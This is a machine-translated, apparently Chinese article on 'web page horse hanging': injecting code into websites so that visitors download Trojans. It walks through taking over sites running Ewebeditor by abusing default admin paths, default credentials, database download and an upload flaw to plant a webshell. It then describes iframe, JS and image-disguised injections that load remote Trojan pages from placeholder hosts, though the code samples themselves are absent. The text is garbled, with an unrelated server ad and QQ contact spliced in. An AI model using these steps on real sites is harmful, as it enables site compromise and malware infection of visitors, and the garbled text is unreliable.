The Web page hangs the horse is the attacker's habitual intrusion means, its influence is extremely bad. Not only let the site managers shame, and implicating make the site visitors suffer. Whether it is a site maintainer or an individual user, it is necessary to master and understand certain Web pages to hang horses and their defensive techniques.
1, about the page hanging horse
Web page Hanging a horse is an attacker who inserts a piece of code on a normal page (usually the home page of a website). When the browser opens the page, the code is executed, and then the server-side program of the Trojan is downloaded and run to control the browser's host.
2. Get Webshell
An attacker who wants to mount a Web page must have permission to modify the site's files, and getting the site Webshell is the most common practice.
In fact, there are more attacks that can be exploited by attackers, such as injection, cross-site, side-note, upload, Bauku, and program vulnerabilities. Here is a list of the current popular Ewebeditor online HTML editor Upload vulnerability to do a demonstration and analysis.
1). website Intrusion Analysis
Ewebeditor is an online HTML editor, and many websites are integrated with this editor to facilitate the release of information. The low version of the Ewebeditor online HTML editor, the existence of the upload vulnerability, hackers use this to get Webshell (Web Management rights), modified the site, carried out the horse operation.
The principle is that the default Administrator page for Ewebeditor is not changed, and the default user name and password are not changed. After the attacker logs on to Ewebeditor, add a new style type, then set the type of upload file, add the ASP file type, you can upload a Web trojan.
2). Identify and analyze Web page vulnerabilities
(1). Attackers determine whether the site is using Ewebeditor method is generally by browsing the site to view the relevant pages or search engines similar to "ewebeditor.asp?id=" statements, as long as similar statements exist, you can judge the Web site does use the website editor.
(2). Ewebeditor editor may be exploited by hackers for security vulnerabilities:
A. The administrator has not modified the path and name of the database, causing the hacker to use the editor's default path to download the site database directly.
B. The administrator has not modified the editor's background management path to allow the hacker to log in using the user name and password obtained from the database. or a default password. Go directly to the background of the editor.
C. There is a security vulnerability in the Web Editor upload program.
Analysis reports that: the site's admin path found cer.asp Web trojan, after analysis for the veterans of the Web Trojan. (after encryption can still be resolved through the signature code, the recommendation of the webmaster Use Reiche ASP webmaster Security Assistant, often detect whether the site was illegally modified. )
3, revealing several of the most important horse-hanging technology
(1). iframe-Type hanging horse
Web Trojan is an attacker using IFRAME statements, loaded into any Web page can be executed in the form of hanging horse, is the earliest and most effective of a network horse-hanging technology. The usual hanging horse code is as follows:
Explanation: After opening the page that inserted the code, it opened the http://www.xxx.com/muma.html page, but because of its length and width are "0", it is very difficult to detect, very covert.
(2). js Script Hanging Horse
JS Hanging Horse is a use of JS script file called principle of the Web Trojan hidden horse technology, such as: hackers first make a. JS file, and then use the JS code to call the page to hang the horse. The usual code is as follows:
Http://www.xxx.com/gm.js is a JS script file, which invokes and executes the Trojan's server. These JS files can usually be generated by the tool, the attacker just need to enter the relevant options.
(3). Picture Camouflage Hanging Horse
With the development of anti-virus technology, black means also constantly updated, picture Trojan technology evade antivirus surveillance of new technology, attackers will resemble: http://www.xxx.com/ Test.htm Trojan code in the test.gif image file, these embedded code images can be generated by the tool, the attacker only need to enter the relevant options, 4. After the image Trojan is generated, and then the code call execution, it is a relatively novel method of hanging horse concealment.
Database Preference Hen server: TKO room dual e5-2670 32 core 128g memory 15m exclusive CN2 bandwidth 6X1TB HDD Super Dual core 1g cache LSI 9265 Array Card 314 IP 4000 yuan/matchmaker Zhang Qq:2881064151
Uncover some of the most important horse-hanging techniques